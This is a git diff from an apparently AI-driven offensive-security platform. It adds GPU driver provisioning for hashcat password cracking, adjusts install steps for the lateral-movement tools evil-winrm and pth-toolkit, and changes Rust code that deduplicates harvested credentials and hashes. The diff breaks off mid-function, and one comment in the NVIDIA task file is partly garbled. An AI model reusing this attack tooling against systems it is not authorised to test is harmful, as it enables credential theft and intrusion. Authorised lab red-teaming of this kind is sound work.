+ "hickory-proto",
+ "ipconfig",
+ "lru-cache",
+ "once_cell",
+ "parking_lot",
+ "rand 0.8.6",
+ "resolv-conf",
+ "smallvec",
+ "thiserror 1.0.69",
+ "tokio",
+ "tracing",
+]
+
[[package]]
name = "hkdf"
version = "0.12.4"
@@ -1316,6 +1381,19 @@ dependencies = [
"serde_core",
]
+[[package]]
+name = "ipconfig"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4d40460c0ce33d6ce4b0630ad68ff63d6661961c48b6dba35e5a4d81cfb48222"
+dependencies = [
+ "socket2",
+ "widestring",
+ "windows-registry",
+ "windows-result",
+ "windows-sys 0.61.2",
+]
+
[[package]]
name = "ipnet"
version = "2.12.0"
@@ -1468,6 +1546,12 @@ dependencies = [
"vcpkg",
]
+[[package]]
+name = "linked-hash-map"
+version = "0.5.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f"
+
[[package]]
name = "linux-raw-sys"
version = "0.12.1"
@@ -1495,6 +1579,15 @@ version = "0.4.29"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897"
+[[package]]
+name = "lru-cache"
+version = "0.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "31e24f1ad8321ca0e8a1e0ac13f23cb668e6f5466c2c57319f6a5cf1cc8e3b1c"
+dependencies = [
+ "linked-hash-map",
+]
+
[[package]]
name = "lru-slab"
version = "0.1.2"
@@ -2261,6 +2354,12 @@ dependencies = [
"web-sys",
]
+[[package]]
+name = "resolv-conf"
+version = "0.7.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1e061d1b48cb8d38042de4ae0a7a6401009d6143dc80d2e2d6f31f0bdd6470c7"
+
[[package]]
name = "ring"
version = "0.17.14"
@@ -3615,13 +3714,19 @@ dependencies = [
"wasite",
]
+[[package]]
+name = "widestring"
+version = "1.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72069c3113ab32ab29e5584db3c6ec55d416895e60715417b5b883a357c3e471"
+
[[package]]
name = "winapi-util"
version = "0.1.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22"
dependencies = [
- "windows-sys 0.48.0",
+ "windows-sys 0.61.2",
]
[[package]]
@@ -3665,6 +3770,17 @@ version = "0.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
+[[package]]
+name = "windows-registry"
+version = "0.6.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02752bf7fbdcce7f2a27a742f798510f3e5ad88dbe84871e5168e2120c3d5720"
+dependencies = [
+ "windows-link",
+ "windows-result",
+ "windows-strings",
+]
+
[[package]]
name = "windows-result"
version = "0.4.1"
diff --git a/Cargo.toml b/Cargo.toml
index 3404af61..784d77f6 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -18,6 +18,7 @@ serde_yaml = "0.9"
regex = "1"
sqlx = { version = "0.8", features = ["runtime-tokio", "postgres", "chrono", "json", "uuid"] }
tera = "1"
+hickory-resolver = { version = "0.24", default-features = false, features = ["tokio-runtime", "system-config"] }
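+# Hedged sketch of the intended use (not the actual call site; resolves via
+# the system resolv.conf per the enabled features):
+#   use hickory_resolver::TokioAsyncResolver;
+#   let resolver = TokioAsyncResolver::tokio_from_system_conf()?;
+#   let ips = resolver.lookup_ip("dc01.contoso.local").await?;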
# OpenTelemetry
opentelemetry = "0.31"
diff --git a/Taskfile.yaml b/Taskfile.yaml
index 878b9d8b..d9b81157 100644
--- a/Taskfile.yaml
+++ b/Taskfile.yaml
@@ -26,6 +26,7 @@ includes:
LOG_DIR: '{{.LOG_DIR}}'
REPORT_DIR: '{{.REPORT_DIR}}'
GRAFANA_URL: '{{.GRAFANA_URL}}'
+ LOKI_URL: '{{.LOKI_URL}}'
DREADNODE_SERVER_URL: '{{.DREADNODE_SERVER_URL}}'
DREADNODE_ORGANIZATION: '{{.DREADNODE_ORGANIZATION}}'
DREADNODE_WORKSPACE: '{{.DREADNODE_WORKSPACE}}'
@@ -51,6 +52,7 @@ includes:
ARES_CONFIG: '{{.ARES_CONFIG}}'
OTEL_TRACES_ENDPOINT: '{{.OTEL_TRACES_ENDPOINT}}'
ALLOY_LOKI_ENDPOINT: '{{.ALLOY_LOKI_ENDPOINT}}'
+ LOKI_URL: '{{.LOKI_URL}}'
blue:
taskfile: .taskfiles/blue/Taskfile.yaml
optional: true
@@ -76,6 +78,7 @@ vars:
# MODEL: '{{.MODEL | default "claude-sonnet-4-5-20250929"}}'
MODEL: '{{.MODEL | default "gpt-5.2"}}'
GRAFANA_URL: '{{.GRAFANA_URL}}'
+ LOKI_URL: '{{.LOKI_URL | default "https://loki.dev.plundr.ai"}}'
POLL_INTERVAL: '{{.POLL_INTERVAL | default "30"}}'
MAX_STEPS_BLUE: '{{.MAX_STEPS_BLUE | default "50"}}'
MAX_STEPS_BLUE_ONCE: '{{.MAX_STEPS_BLUE_ONCE | default "15"}}' # ~15 min max for once mode
diff --git a/ansible/playbooks/ares/goad_attack_box.yml b/ansible/playbooks/ares/goad_attack_box.yml
index 2cc04435..7a30c485 100644
--- a/ansible/playbooks/ares/goad_attack_box.yml
+++ b/ansible/playbooks/ares/goad_attack_box.yml
@@ -32,7 +32,7 @@
alloy_deployment_name: "goad-attack-box"
alloy_server_id: ""
alloy_instance_id: ""
- alloy_loki_endpoint: "{{ alloy_loki_endpoint }}"
+ alloy_loki_endpoint: "{{ lookup('env', 'ALLOY_LOKI_ENDPOINT') | default('http://localhost:3100/loki/api/v1/push', true) }}"
alloy_version: "1.10.1"
# Python version
@@ -45,6 +45,12 @@
cracking_tools_gpu_support: true
cracking_tools_hashcat_from_source: true
cracking_tools_nvidia_opencl_icd: true
+ # Bake the kernel-mode NVIDIA driver + CUDA into the image. Without these,
+ # hashcat on g4dn (T4) reports "OpenCL platform not found" and falls back
+ # to john-on-CPU, which is too slow to feed credential cracks back into
+ # the orchestrator within an op's budget.
+ cracking_tools_install_nvidia_driver: true
+ cracking_tools_install_cuda_toolkit: true
cracking_tools_wordlists:
- rockyou
- seclists_passwords
@@ -113,9 +119,14 @@
changed_when: true
roles:
- # AWS infrastructure agents
+ # AWS infrastructure agents — skipped on non-AWS clouds because they
+ # require the EC2 instance metadata service (cloudwatch-agent's
+ # `fetch-config -m ec2` hits 169.254.169.254 and aborts the build
+ # on Azure).
- role: dreadnode.nimbus_range.aws_ssm_agent
+ when: cloud_provider | default('aws') == 'aws'
- role: dreadnode.nimbus_range.aws_cloudwatch_agent
+ when: cloud_provider | default('aws') == 'aws'
# Base Ares requirements
- role: dreadnode.nimbus_range.base
diff --git a/ansible/roles/base/README.md b/ansible/roles/base/README.md
index 6c13b679..a4449559 100644
--- a/ansible/roles/base/README.md
+++ b/ansible/roles/base/README.md
@@ -34,10 +34,9 @@ Base requirements for Ares AI agents
| `base_pip_packages.0` | str | python-dotenv | No description |
| `base_pip_packages.1` | str | rigging>=3.0 | No description |
| `base_pip_packages.2` | str | pydantic | No description |
-| `base_pip_packages.3` | str | asyncio | No description |
-| `base_pip_packages.4` | str | aiohttp>=3.13.4 | No description |
-| `base_pip_packages.5` | str | cryptography>=44.0.1 | No description |
-| `base_pip_packages.6` | str | requests>=2.33.0 | No description |
+| `base_pip_packages.3` | str | aiohttp>=3.13.4 | No description |
+| `base_pip_packages.4` | str | cryptography>=44.0.1 | No description |
+| `base_pip_packages.5` | str | requests>=2.33.0 | No description |
| `base_pip_externally_managed` | bool | False | No description |
| `base_pip_break_required` | bool | False | No description |
| `base_system_packages` | list | [] | No description |
@@ -140,7 +139,10 @@ Base requirements for Ares AI agents
- **Fail when break-system-packages is required but disabled** (ansible.builtin.fail) - Conditional
- **Fail when break-system-packages is required but unsupported by pip** (ansible.builtin.fail) - Conditional
- **Upgrade pip to latest (CVE fixes)** (ansible.builtin.command)
-- **Install Ares Python dependencies** (ansible.builtin.pip)
+- **Install Ares Python dependencies (with full log)** (ansible.builtin.shell)
+- **Show pip install log tail on failure** (ansible.builtin.command) - Conditional
+- **Print pip install tail** (ansible.builtin.debug) - Conditional
+- **Fail if pip install failed** (ansible.builtin.fail) - Conditional
- **Create Ares workspace directory** (ansible.builtin.file) - Conditional
### main.yml
diff --git a/ansible/roles/base/defaults/main.yml b/ansible/roles/base/defaults/main.yml
index 6588b5a0..e366f5da 100644
--- a/ansible/roles/base/defaults/main.yml
+++ b/ansible/roles/base/defaults/main.yml
@@ -28,11 +28,14 @@ base_rust_install_script: "https://sh.rustup.rs"
base_install_pipx: true
# Ares Python dependencies (installed via pip)
+# Do NOT add `asyncio` here — Python 3.4+ ships asyncio in the stdlib. The
+# PyPI `asyncio` package is a 2015-era stub that ships an `asyncio.py` into
+# site-packages, shadowing the stdlib module and breaking any import of
+# asyncio (including the rest of this pip install run on Python 3.13).
base_pip_packages:
- python-dotenv
- "rigging>=3.0"
- pydantic
- - asyncio
- "aiohttp>=3.13.4"
- "cryptography>=44.0.1"
- "requests>=2.33.0"
diff --git a/ansible/roles/base/tasks/linux.yml b/ansible/roles/base/tasks/linux.yml
index 62d42782..4b7350ab 100644
--- a/ansible/roles/base/tasks/linux.yml
+++ b/ansible/roles/base/tasks/linux.yml
@@ -142,16 +142,50 @@
become: true
changed_when: false
-- name: Install Ares Python dependencies
- ansible.builtin.pip:
- name: "{{ base_pip_packages }}"
- state: present
- executable: "{{ base_pip_executable }}"
- extra_args: >-
- {{ '--break-system-packages' if base_pip_break_required else '' }}
- {{ '--ignore-installed' if ansible_facts['os_family'] == 'Debian' else '' }}
+# Run pip directly via shell so we can tee stdout+stderr to a log file. The
+# ansible.builtin.pip module captures output into a single `msg` field that
+# is too large for CloudWatch's per-event size limit on this dep tree
+# (rigging pulls 100+ transitives), so failures show up as a truncated stdout
+# with no stderr or rc visible. The tee'd log lets the next task surface the
+# real error.
+#
+# `--ignore-installed` is required: Kali ships several Python deps via apt
+# (python3-requests, python3-cryptography, python3-urllib3, python3-yaml).
+# apt-installed packages have no pip RECORD file, so pip's normal upgrade
+# path fails with `uninstall-no-record-file` ("The package was installed
+# by debian"). `--ignore-installed` skips uninstall and overwrites in place.
+- name: Install Ares Python dependencies (with full log)
+ ansible.builtin.shell:
+ cmd: |
+ set -o pipefail
+ {{ base_pip_executable }} install \
+ {{ '--break-system-packages' if base_pip_break_required else '' }} \
+ --ignore-installed \
+ --no-color \
+ {{ base_pip_packages | map('quote') | join(' ') }} \
+ 2>&1 | tee /tmp/ares-pip-install.log
+ executable: /bin/bash
+ become: true
+ register: base_pip_install_result
+ changed_when: false
+ failed_when: false
+
+- name: Show pip install log tail on failure
+ ansible.builtin.command: tail -120 /tmp/ares-pip-install.log
become: true
+ register: base_pip_install_tail
changed_when: false
+ when: base_pip_install_result.rc != 0
+
+- name: Print pip install tail
+ ansible.builtin.debug:
+ var: base_pip_install_tail.stdout_lines
+ when: base_pip_install_result.rc != 0
+
+- name: Fail if pip install failed
+ ansible.builtin.fail:
+ msg: "pip install failed (rc={{ base_pip_install_result.rc }}); see tail above"
+ when: base_pip_install_result.rc != 0
- name: Create Ares workspace directory
ansible.builtin.file:
diff --git a/ansible/roles/cracking_tools/README.md b/ansible/roles/cracking_tools/README.md
index 6c12b795..29795586 100644
--- a/ansible/roles/cracking_tools/README.md
+++ b/ansible/roles/cracking_tools/README.md
@@ -53,6 +53,17 @@ Install and configure password cracking tools for Ares agents
| `cracking_tools_opencl_packages.1` | str | opencl-headers | No description |
| `cracking_tools_opencl_packages.2` | str | clinfo | No description |
| `cracking_tools_nvidia_opencl_icd` | bool | False | No description |
+| `cracking_tools_install_nvidia_driver` | bool | False | No description |
+| `cracking_tools_install_cuda_toolkit` | bool | False | No description |
+| `cracking_tools_nvidia_driver_packages` | list | [] | No description |
+| `cracking_tools_nvidia_driver_packages.0` | str | linux-headers-cloud-amd64 | No description |
+| `cracking_tools_nvidia_driver_packages.1` | str | dkms | No description |
+| `cracking_tools_nvidia_driver_packages.2` | str | firmware-misc-nonfree | No description |
+| `cracking_tools_nvidia_driver_packages.3` | str | nvidia-kernel-open-dkms | No description |
+| `cracking_tools_nvidia_driver_packages.4` | str | nvidia-driver-cuda | No description |
+| `cracking_tools_nvidia_driver_packages.5` | str | nvidia-opencl-icd | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages` | list | [] | No description |
+| `cracking_tools_nvidia_cuda_toolkit_packages.0` | str | nvidia-cuda-toolkit | No description |
| `cracking_tools_update_cache` | bool | True | No description |
## Tasks
@@ -94,9 +105,17 @@ Install and configure password cracking tools for Ares agents
- **Set DEBIAN_FRONTEND to noninteractive** (ansible.builtin.lineinfile) - Conditional
- **Update apt cache** (ansible.builtin.apt) - Conditional
- **Create wordlist directory** (ansible.builtin.file)
+- **Install NVIDIA driver and OpenCL runtime (with full log)** (ansible.builtin.shell) - Conditional
+- **Show NVIDIA install log tail on failure** (ansible.builtin.command) - Conditional
+- **Print NVIDIA install tail** (ansible.builtin.debug) - Conditional
+- **Fail if NVIDIA install failed** (ansible.builtin.fail) - Conditional
+- **Install NVIDIA CUDA toolkit** (ansible.builtin.apt) - Conditional
- **Install GPU support packages** (ansible.builtin.apt) - Conditional
- **Create OpenCL vendors directory** (ansible.builtin.file) - Conditional
- **Register NVIDIA OpenCL ICD** (ansible.builtin.copy) - Conditional
+- **Verify NVIDIA driver (non-fatal — no GPU on builder hosts)** (ansible.builtin.command) - Conditional
+- **Verify OpenCL platform discovery (non-fatal)** (ansible.builtin.command) - Conditional
+- **Show GPU/OpenCL detection summary** (ansible.builtin.debug) - Conditional
- **Ensure libgcc runtime is present for hashcat** (block) - Conditional
- **Install primary libgcc package** (ansible.builtin.apt)
- **Ensure libgcc static archive is present for hashcat** (block) - Conditional
diff --git a/ansible/roles/cracking_tools/defaults/main.yml b/ansible/roles/cracking_tools/defaults/main.yml
index 4fe3e9b7..af1d326c 100644
--- a/ansible/roles/cracking_tools/defaults/main.yml
+++ b/ansible/roles/cracking_tools/defaults/main.yml
@@ -50,4 +50,35 @@ cracking_tools_opencl_packages:
# Set to true when using nvidia/cuda base image to register NVIDIA OpenCL ICD
cracking_tools_nvidia_opencl_icd: false
+# Install the NVIDIA kernel-mode driver + OpenCL runtime on the host. Required
+# on bare-metal/AMI builds (g4dn etc.) where the Kali base image ships without
+# any NVIDIA bits — without this hashcat reports "OpenCL platform not found".
+# Leave false for container builds: the nvidia/cuda runtime base image
+# already provides libnvidia-opencl/libcuda, and the kernel module comes
+# from the host via nvidia-container-toolkit.
+cracking_tools_install_nvidia_driver: false
+# Install the full CUDA toolkit so hashcat can use the CUDA backend (faster
+# than OpenCL on T4/A10/etc.). Pulls ~3GB; only enable on AMI builds.
+cracking_tools_install_cuda_toolkit: false
+# Recommends are intentionally enabled — DKMS, libcuda1, and the kernel
+# module build chain come in via Recommends on Debian/Kali.
+# Kali AMIs ship `+kali-cloud-amd64` kernel — needs the `cloud` headers
+# meta-package. We pull driver + open-source kernel module from NVIDIA's
+# CUDA Debian repo (added in tasks/linux.yml) because Kali's archive
+# nvidia-driver (550.163.01) does not build against kernel 6.19+.
+# `nvidia-kernel-open-dkms` is required for Turing+ (T4 included) on
+# modern kernels; legacy `nvidia-kernel-dkms` is a dead-end here. Pair it
+# with `nvidia-driver-cuda` (CUDA-only userspace) — the `cuda-drivers`
+# meta and full `nvidia-driver` both pull `nvidia-kernel-dkms` (closed
+# kernel module), which Conflicts with the open variant.
+cracking_tools_nvidia_driver_packages:
+ - linux-headers-cloud-amd64
+ - dkms
+ - firmware-misc-nonfree
+ - nvidia-kernel-open-dkms
+ - nvidia-driver-cuda
+ - nvidia-opencl-icd
+cracking_tools_nvidia_cuda_toolkit_packages:
+ - nvidia-cuda-toolkit
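+# Post-install spot-check that DKMS built the open module (hedged; exact
+# version strings vary):
+#   dkms status | grep nvidia          # expect: nvidia/5xx.xx ... installed
+#   modinfo nvidia | grep -i license   # open module reports "Dual MIT/GPL"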
+
cracking_tools_update_cache: true
diff --git a/ansible/roles/cracking_tools/tasks/linux.yml b/ansible/roles/cracking_tools/tasks/linux.yml
index 551746d3..367f9d24 100644
--- a/ansible/roles/cracking_tools/tasks/linux.yml
+++ b/ansible/roles/cracking_tools/tasks/linux.yml
@@ -24,6 +24,131 @@
mode: '0755'
become: true
+# Kali rolling ships kernel 6.19.x, which the Kali archive's NVIDIA driver
+# (550.163.01) cannot compile against — DKMS exits 2. NVIDIA's official
+# CUDA Debian repo carries 575+ which supports modern kernels and offers
+# `nvidia-open-kernel-dkms` (open-source kernel module) for Turing+ GPUs.
+# `nvidia-kernel-open-dkms` (open-source kernel module) for Turing+ GPUs.
+# packages instead of the stale Kali ones.
+- name: Add NVIDIA CUDA apt repository (Kali ships 550.x which fails on kernel 6.19+)
+ ansible.builtin.shell: |
+ set -euxo pipefail
+ cd /tmp
+ curl -fsSLo cuda-keyring.deb \
+ https://developer.download.nvidia.com/compute/cuda/repos/debian13/x86_64/cuda-keyring_1.1-1_all.deb
+ apt-get install -y ./cuda-keyring.deb
+ apt-get update -q
+ rm -f cuda-keyring.deb
+ args:
+ creates: /usr/share/keyrings/cuda-archive-keyring.gpg
+ executable: /bin/bash
+ become: true
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+# Install kernel headers + dkms FIRST in their own apt transaction, so they
+# are fully configured before NVIDIA's dpkg postinst runs `dkms autoinstall`.
+# When mixed in a single apt-get call, dpkg may configure
+# `nvidia-kernel-open-dkms` before `linux-headers-cloud-amd64` finishes
+# setting up, and DKMS exits 2 because the headers aren't yet in place.
+- name: Install kernel headers and DKMS prerequisites
+ ansible.builtin.apt:
+ name:
+ - linux-headers-cloud-amd64
+ - dkms
+ - build-essential
+ - firmware-misc-nonfree
+ state: present
+ install_recommends: true
+ become: true
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+# Driven through shell+tee instead of ansible.builtin.apt: the apt module
+# captures dpkg stderr but truncates large stdout (DKMS kernel-module build
+# errors land deep in apt-get's output, well after the cutoff). With tee we
+# can show the real error on failure.
+- name: Install NVIDIA driver and OpenCL runtime (with full log)
+ ansible.builtin.shell:
+ cmd: |
+ set -o pipefail
+ DEBIAN_FRONTEND=noninteractive apt-get install -y \
+ -o Dpkg::Options::=--force-confdef \
+ -o Dpkg::Options::=--force-confold \
+ -o APT::Install-Recommends=yes \
+ {{ cracking_tools_nvidia_driver_packages | map('quote') | join(' ') }} \
+ 2>&1 | tee /tmp/ares-nvidia-install.log
+ executable: /bin/bash
+ become: true
+ register: cracking_tools_nvidia_install_result
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - ansible_facts['os_family'] == 'Debian'
+
+- name: Show NVIDIA install log tail on failure
+ ansible.builtin.command: tail -200 /tmp/ares-nvidia-install.log
+ become: true
+ register: cracking_tools_nvidia_install_tail
+ changed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Print NVIDIA install tail
+ ansible.builtin.debug:
+ var: cracking_tools_nvidia_install_tail.stdout_lines
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Dump DKMS make.log on failure
+ ansible.builtin.shell: |
+ set +e
+ for f in /var/lib/dkms/nvidia/*/build/make.log; do
+ echo "==== $f ===="
+ tail -150 "$f" 2>&1 || true
+ done
+ echo "==== build env ===="
+ which gcc cc make 2>&1 || true
+ gcc --version 2>&1 || true
+ dpkg -l build-essential gcc make 2>&1 | tail -10 || true
+ args:
+ executable: /bin/bash
+ register: cracking_tools_dkms_make_log
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Print DKMS make.log
+ ansible.builtin.debug:
+ var: cracking_tools_dkms_make_log.stdout_lines
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Fail if NVIDIA install failed
+ ansible.builtin.fail:
+ msg: "NVIDIA driver install failed (rc={{ cracking_tools_nvidia_install_result.rc }}); see tail above"
+ when:
+ - cracking_tools_install_nvidia_driver | bool
+ - cracking_tools_nvidia_install_result.rc | default(0) != 0
+
+- name: Install NVIDIA CUDA toolkit
+ ansible.builtin.apt:
+ name: "{{ cracking_tools_nvidia_cuda_toolkit_packages }}"
+ state: present
+ install_recommends: true
+ become: true
+ when:
+ - cracking_tools_install_cuda_toolkit | bool
+ - ansible_facts['os_family'] == 'Debian'
+
- name: Install GPU support packages
ansible.builtin.apt:
name: "{{ cracking_tools_opencl_packages }}"
@@ -51,6 +176,33 @@
- cracking_tools_gpu_support | bool
- cracking_tools_nvidia_opencl_icd | default(false) | bool
+# nvidia-smi/clinfo return non-zero on a CPU-only AMI builder (no GPU
+# attached), which is expected. The checks are purely informational: they
+# log the result so a real driver failure on the first GPU boot is easy to
+# spot.
+- name: Verify NVIDIA driver (non-fatal — no GPU on builder hosts)
+ ansible.builtin.command: nvidia-smi
+ register: cracking_tools_nvidia_smi
+ changed_when: false
+ failed_when: false
+ when: cracking_tools_install_nvidia_driver | bool
+
+- name: Verify OpenCL platform discovery (non-fatal)
+ ansible.builtin.command: clinfo -l
+ register: cracking_tools_clinfo
+ changed_when: false
+ failed_when: false
+ when:
+ - cracking_tools_gpu_support | bool
+ - cracking_tools_install_nvidia_driver | bool
+
+- name: Show GPU/OpenCL detection summary
+ ansible.builtin.debug:
+ msg:
+ - "nvidia-smi rc={{ cracking_tools_nvidia_smi.rc | default('skipped') }}"
+ - "clinfo rc={{ cracking_tools_clinfo.rc | default('skipped') }}"
+ - "{{ cracking_tools_clinfo.stdout | default('clinfo not run') }}"
+ when: cracking_tools_install_nvidia_driver | bool
+
- name: Ensure libgcc runtime is present for hashcat
when:
- cracking_tools_install_hashcat
diff --git a/ansible/roles/lateral_movement_tools/README.md b/ansible/roles/lateral_movement_tools/README.md
index 8d194ff0..690de5fd 100644
--- a/ansible/roles/lateral_movement_tools/README.md
+++ b/ansible/roles/lateral_movement_tools/README.md
@@ -118,7 +118,7 @@ Install and configure lateral movement and credential extraction tools for Ares
- **Create symlink for ffitarget.h in standard include path** (ansible.builtin.file) - Conditional
- **Install rubyzip gem for evil-winrm dependency** (community.general.gem) - Conditional
- **Install evil-winrm gem (Ubuntu only, Kali uses apt)** (community.general.gem) - Conditional
-- **Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)** (ansible.builtin.command) - Conditional
+- **Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)** (ansible.builtin.command) - Conditional
- **Install pth-toolkit (Kali only - may not be available in all repos)** (ansible.builtin.apt) - Conditional
- **Warn if pth-toolkit installation failed** (ansible.builtin.debug) - Conditional
- **Install Impacket from source for lateral movement tools** (ansible.builtin.include_tasks) - Conditional
diff --git a/ansible/roles/lateral_movement_tools/tasks/linux.yml b/ansible/roles/lateral_movement_tools/tasks/linux.yml
index 5ca9c59f..3abc6318 100644
--- a/ansible/roles/lateral_movement_tools/tasks/linux.yml
+++ b/ansible/roles/lateral_movement_tools/tasks/linux.yml
@@ -229,12 +229,25 @@
- ansible_facts['distribution'] != 'Kali'
- lateral_movement_tools_install_evil_winrm
-- name: Update vulnerable ruby gem dependencies (net-imap, resolv, rexml, uri, zlib)
- ansible.builtin.command: gem update net-imap resolv rexml uri zlib
+# `gem update` is skipped on Kali: evil-winrm ships via apt and Kali tracks
+# CVE patches for net-imap/rexml/uri/zlib through its `ruby-*` debs. On
+# AMI builders, `gem update` here also tends to SIGKILL (rc=-9) inside the
+# Image Builder runner regardless of `--no-document`, so we keep it
+# best-effort with `failed_when: false` and limit it to non-Kali Debian.
+- name: Update vulnerable ruby gem dependencies (Ubuntu only - Kali patches via apt)
+ ansible.builtin.command: gem update --no-document {{ item }}
become: true
changed_when: true
+ failed_when: false
+ loop:
+ - net-imap
+ - resolv
+ - rexml
+ - uri
+ - zlib
when:
- ansible_facts['os_family'] == 'Debian'
+ - ansible_facts['distribution'] != 'Kali'
- lateral_movement_tools_install_evil_winrm
- name: Install pth-toolkit (Kali only - may not be available in all repos)
diff --git a/ares-cli/Cargo.toml b/ares-cli/Cargo.toml
index ba2f93bf..7f4ff676 100644
--- a/ares-cli/Cargo.toml
+++ b/ares-cli/Cargo.toml
@@ -32,6 +32,7 @@ regex = { workspace = true }
dotenvy = "0.15"
async-trait = "0.1"
thiserror = { workspace = true }
+hickory-resolver = { workspace = true }
[build-dependencies]
serde = { version = "1", features = ["derive"] }
diff --git a/ares-cli/src/dedup/credentials.rs b/ares-cli/src/dedup/credentials.rs
index d31ae140..416d0401 100644
--- a/ares-cli/src/dedup/credentials.rs
+++ b/ares-cli/src/dedup/credentials.rs
@@ -5,7 +5,7 @@ use std::sync::LazyLock;
use ares_core::models::Credential;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
/// Strip ANSI escape sequences from text.
pub(super) static RE_ANSI: LazyLock<Regex> =
@@ -75,6 +75,9 @@ pub(crate) fn sanitize_credentials(creds: &mut Vec<Credential>) {
if username.starts_with("evil") && username.ends_with('$') {
return false;
}
+ if is_ghost_machine_account(&username) {
+ return false;
+ }
true
});
}
diff --git a/ares-cli/src/dedup/domains.rs b/ares-cli/src/dedup/domains.rs
index b0bd5a0c..82818add 100644
--- a/ares-cli/src/dedup/domains.rs
+++ b/ares-cli/src/dedup/domains.rs
@@ -179,12 +179,14 @@ pub(crate) fn normalize_state_domains(
{
    let mut valid_domains: HashSet<String> = HashSet::new();
+    let mut host_fqdns: HashSet<String> = HashSet::new();
if let Some(td) = target_domain {
valid_domains.insert(td.to_lowercase());
}
for host in hosts {
if !host.hostname.is_empty() && host.hostname.contains('.') {
let lower = host.hostname.to_lowercase();
+ host_fqdns.insert(lower.clone());
let parts: Vec<&str> = lower.split('.').collect();
if parts.len() > 1 {
valid_domains.insert(parts[1..].join("."));
@@ -193,10 +195,20 @@ pub(crate) fn normalize_state_domains(
}
for user in users {
if !user.domain.is_empty() {
- valid_domains.insert(user.domain.to_lowercase());
+ let d = user.domain.to_lowercase();
+ // Skip user.domain values that are actually a host FQDN —
+ // some parsers misattribute and assign the DC's FQDN as the
+ // user's AD domain, which would otherwise let the FQDN survive
+ // the retain() filter below as a phantom "domain".
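+            // e.g. a user row carrying domain "win-30dz5ngfa7m.c26h.local"
+            // (a DC's FQDN) must not legitimize that FQDN as a domain.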
+ if !host_fqdns.contains(&d) {
+ valid_domains.insert(d);
+ }
}
}
- domains.retain(|d| valid_domains.contains(&d.to_lowercase()));
+ domains.retain(|d| {
+ let lower = d.to_lowercase();
+ valid_domains.contains(&lower) && !host_fqdns.contains(&lower)
+ });
}
}
diff --git a/ares-cli/src/dedup/hashes.rs b/ares-cli/src/dedup/hashes.rs
index 184bbec8..26c84e1f 100644
--- a/ares-cli/src/dedup/hashes.rs
+++ b/ares-cli/src/dedup/hashes.rs
@@ -1,9 +1,9 @@
-use std::collections::HashSet;
+use std::collections::{HashMap, HashSet};
use ares_core::models::Hash;
use super::credentials::strip_ansi;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
fn normalize_hash_type(hash_type: &str) -> String {
match hash_type.trim().to_lowercase().as_str() {
@@ -17,20 +17,58 @@ fn normalize_hash_type(hash_type: &str) -> String {
}
pub(crate) fn dedup_hashes(hashes: &[Hash]) -> Vec<Hash> {
- let mut seen = HashSet::new();
- let mut result = Vec::new();
+ // First pass: for each (username, hash_type, hash_value), remember the longest
+ // non-empty domain we've seen. Parsers sometimes emit the same hash twice — once
+ // with `DOMAIN\` prefix (populated domain) and once bare (empty domain) — and
+ // without this lookup the keyed-by-domain dedup keeps both as separate rows.
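+    // e.g. the same NTLM hash seen once with domain "" and once with
+    // "contoso.local" folds into one row keyed under "contoso.local".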
+ let mut domain_lookup: HashMap<(String, String, String), String> = HashMap::new();
for h in hashes {
let domain = strip_trailing_dot(h.domain.trim()).to_lowercase();
- let hash_value = strip_ansi(&h.hash_value);
+ if domain.is_empty() {
+ continue;
+ }
let key = (
- domain.clone(),
h.username.trim().to_lowercase(),
h.hash_type.trim().to_lowercase(),
- hash_value.trim().to_lowercase(),
+ strip_ansi(&h.hash_value).trim().to_lowercase(),
);
+ domain_lookup
+ .entry(key)
+ .and_modify(|d| {
+ if domain.len() > d.len() {
+ *d = domain.clone();
+ }
+ })
+ .or_insert(domain);
+ }
+
+ let mut seen = HashSet::new();
+ let mut result = Vec::new();
+ for h in hashes {
+ let username = strip_ansi(&h.username);
+ if is_ghost_machine_account(&username) {
+ continue;
+ }
+ let username_l = h.username.trim().to_lowercase();
+ let hash_type_l = h.hash_type.trim().to_lowercase();
+ let hash_value = strip_ansi(&h.hash_value);
+ let hash_value_l = hash_value.trim().to_lowercase();
+
+ let mut domain = strip_trailing_dot(h.domain.trim()).to_lowercase();
+ if domain.is_empty() {
+ if let Some(d) = domain_lookup.get(&(
+ username_l.clone(),
+ hash_type_l.clone(),
+ hash_value_l.clone(),
+ )) {
+ domain.clone_from(d);
+ }
+ }
+
+ let key = (domain.clone(), username_l, hash_type_l, hash_value_l);
if seen.insert(key) {
let mut cleaned = h.clone();
